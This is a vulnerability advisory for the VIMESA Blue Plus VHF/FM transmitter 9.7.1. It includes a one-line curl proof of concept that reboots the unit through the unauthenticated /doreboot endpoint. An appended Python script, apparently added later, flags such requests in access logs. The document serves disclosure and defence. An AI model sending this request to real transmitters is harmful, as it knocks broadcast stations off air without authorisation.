
VIMESA VHF/FM Transmitter Blue Plus 9.7.1 Denial Of Service

VIMESA VHF/FM Transmitter Blue Plus version 9.7.1 suffers from a denial of service vulnerability. An unauthenticated attacker can issue an unauthorized HTTP GET request to the unprotected endpoint doreboot and restart the transmitter operations.

Packet Storm
VIMESA VHF/FM Transmitter Blue Plus 9.7.1 (doreboot) Remote Denial Of Service

Vendor: Video Medios, S.A. (VIMESA)
Product web page: https://www.vimesa.es
Affected version: img:v9.7.1 Html:v2.4 RS485:v2.5

Summary: The transmitter Blue Plus is designed with all the latest technologies, such as high efficiency using the latest generation LDMOS transistor and high efficiency power supplies. We used a modern interface and performance using a color display with touch screen, with easy management software and easy to use. The transmitter is equipped with all audio input including Audio IP for a complete audio interface. The VHF/FM transmitter 30-1000 is intended for the transmission of frequency modulated broadcasts in mono or stereo. It works with broadband characteristics in the VHF frequency range from 87.5-108 MHz and can be operated with any frequency in this range without alignment. The transmitter output power is variable between 10 and 110% of the nominal Power. It is available with different remote control ports. It can store up to six broadcast programs including program specific parameters such as frequency, RF output power, modulation type, RDS, AF level and deviation limiting. The transmitter is equipped with a LAN interface that permits the complete remote control of the transmitter operation via SNMP or Web Server.

Desc: The device is suffering from a Denial of Service (DoS) vulnerability. An unauthenticated attacker can issue an unauthorized HTTP GET request to the unprotected endpoint 'doreboot' and restart the transmitter operations.

Tested on: lighttpd/1.4.32

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience

Advisory ID: ZSL-2023-5798
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5798.php

22.07.2023

--

$ curl -v "http://192.168.3.11:5007/doreboot"
*   Trying 192.168.3.11:5007...
* Connected to 192.168.3.11 (192.168.3.11) port 5007 (#0)
> GET /doreboot HTTP/1.1
> Host: 192.168.3.11:5007
> User-Agent: curl/8.0.1
> Accept: */*
>
* Recv failure: Connection was reset
* Closing connection 0
curl: (56) Recv failure: Connection was reset
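Added example, not part of the original advisory or the vendor's code: a log check that flags requests to the 'doreboot' endpoint coming from hosts outside a management allow-list. It assumes access-log lines in lighttpd's default accesslog format (from the device or from a reverse proxy in front of it); the allow-list address and the sample lines are constructed.

```python
import ipaddress
import re

# Assumption: lines follow lighttpd's default accesslog format
#   %h %V %u %t "%r" %>s %b "%{Referer}i" "%{User-Agent}i"
LINE_RE = re.compile(
    r'^(?P<src>\S+) (?P<vhost>\S+) (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)(?: HTTP/[\d.]+)?" '
    r'(?P<status>\d{3}|-) (?P<size>\d+|-)'
)

# Hypothetical management host allowed to restart the transmitter.
ALLOWED_SOURCES = [ipaddress.ip_network("192.168.3.50/32")]

def is_reboot_request(target):
    """True when the request path (query string stripped) is /doreboot."""
    path = target.split("?", 1)[0].split("#", 1)[0]
    return path.rstrip("/").lower() == "/doreboot"

def find_reboot_requests(lines, allowed=ALLOWED_SOURCES):
    """Return (timestamp, source, user) for /doreboot hits from non-allowed sources."""
    hits = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m or not is_reboot_request(m["target"]):
            continue
        try:
            src = ipaddress.ip_address(m["src"])
            trusted = any(src in net for net in allowed)
        except ValueError:
            trusted = False  # unparseable source field: treat as untrusted
        if not trusted:
            hits.append((m["ts"], m["src"], m["user"]))
    return hits

# Constructed sample lines (not taken from a real device).
SAMPLE_LOG = [
    '192.168.3.50 192.168.3.11:5007 - [22/Jul/2023:10:01:12 +0200] "GET /doreboot HTTP/1.1" 200 0 "-" "Mozilla/5.0"',
    '192.168.3.77 192.168.3.11:5007 - [22/Jul/2023:10:04:40 +0200] "GET /doreboot HTTP/1.1" 200 0 "-" "curl/8.0.1"',
    '192.168.3.77 192.168.3.11:5007 - [22/Jul/2023:10:05:02 +0200] "GET /index.html HTTP/1.1" 200 5120 "-" "curl/8.0.1"',
    '10.0.0.9 192.168.3.11:5007 - [22/Jul/2023:10:09:31 +0200] "GET /doreboot?x=1 HTTP/1.1" 200 0 "-" "-"',
]

if __name__ == "__main__":
    for ts, src, user in find_reboot_requests(SAMPLE_LOG):
        print(f"{ts} unauthorized reboot request from {src} (user={user})")
```

Because the endpoint requires no authentication, the user field is expected to be "-" even for legitimate restarts, so the source address is the only attribution the log provides.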
